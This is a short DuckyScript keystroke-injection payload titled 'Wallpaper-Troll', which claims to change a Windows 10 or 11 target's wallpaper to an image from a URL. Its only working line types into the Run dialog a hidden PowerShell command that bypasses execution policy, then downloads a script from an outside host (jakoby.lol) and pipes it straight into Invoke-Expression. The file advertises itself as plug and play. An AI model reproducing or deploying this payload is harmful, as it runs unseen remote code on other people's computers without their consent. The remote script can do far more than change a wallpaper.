REM     Title: Wallpaper-Troll
REM
REM     Author: gam3r999
REM
REM     Description: This payload will change your targets wallpaper to an image from a provided url
REM     Target: Windows 10, 11
REM
REM     --------------------------------------------------------------------------------------
REM     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM     --------------------------------------------------------------------------------------
REM
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $url='https://ibb.co/2TrsZG0';irm jakoby.lol/pkw | iex
DELAY 500
ENTER
